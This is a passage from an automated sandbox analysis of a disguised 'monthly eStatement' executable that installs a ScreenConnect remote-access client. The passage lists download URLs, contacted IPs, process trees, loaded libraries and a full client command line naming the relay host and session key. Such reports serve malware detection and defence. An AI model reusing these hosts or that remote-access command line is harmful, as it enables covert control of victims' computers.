                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageSX
                  Source: dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config.
                  Source: dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config_
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B43E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsCl
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe&
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exeX
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileMa
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe.config6
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exx
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49771 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49798 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49814 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                  System Summary

                  Source: monthly-eStatementForum120478962.Client.exe PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7160 -ip 7160
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal51.evad.winEXE@19/76@3/2
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Deployment
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7160
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCommand line argument: dfshim0_2_00F21000
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe "C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe"
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "c62c9dea-32aa-435a-858b-87f989247e7c" "User"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7160 -ip 7160
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 332
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 332
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: certificate valid
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B424A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EBB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569312203.0000000002F12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: monthly-eStatementForum120478962.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4246000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.1567594933.0000000002CD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3155817267.00000000029B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3156144988.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
